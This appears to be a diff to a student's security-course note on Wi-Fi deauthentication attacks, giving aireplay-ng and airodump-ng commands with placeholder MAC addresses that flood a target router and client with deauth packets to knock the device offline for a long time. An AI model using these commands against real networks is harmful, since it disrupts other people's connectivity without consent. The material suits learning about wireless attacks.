Henry-wxq/CS_Notes/Kali/2_Network_Hacking/Pre-Connection/2_4_Deauthentication_Attack.md

     3. This will allow us to successfully disconnect or deauthenticate any client from any network.
 ![Precedure](./pic/2_4_1.jpg)

-3. Using aireplay-ng
+3. Using aireplay-ng in practice
-    1. Command
     ```
+    # 1. Firstly, when we want to make it successful, we need to split the terminal window and run the packet sniffing and deauth at the same time.

+    airodump-ng --bssid [BSSID] --channel [Channel] [interface name]

+    # 2. Using the aireplay-ng

-    aireplay-ng --deauth 100000000 -a [MAC Address of the target network] -c [MAC Address of the target client] -D [interface name]
+    aireplay-ng --deauth 100000000 -a [MAC Address of the target network] -c [MAC Address of the target client] (-D) [interface name]
     # 100000000 is number of deauthentication packets that I want to send.
 It's always very large so can keep sending it to both the router and the target device to disconnect it for a long time.
     # Add -D is the target is 5Ghz

-    ```
-    2. Sometimes the client will automatically connect to a new network, which we just need to do this again
-    3. Always, when we want to make it successful, we need to split the terminal window and run the packet sniffing and deauth at the same time.
-    ```
-    airodump-ng --bssid [BSSID] --channel [Channel] [interface name]
+    # 3. If this still doesn't work meaning the target is using both 2.4Ghz and 5Ghz, which we need to repeat the above procedure again in another frequency(Mostly when attacking the PC).
+Although it might still can't disconnect in the display but the network of the target will be extremely slow.
+And we need to buy a better wireless adapter.
     ```
     ![Result](./pic/2_4_2.png)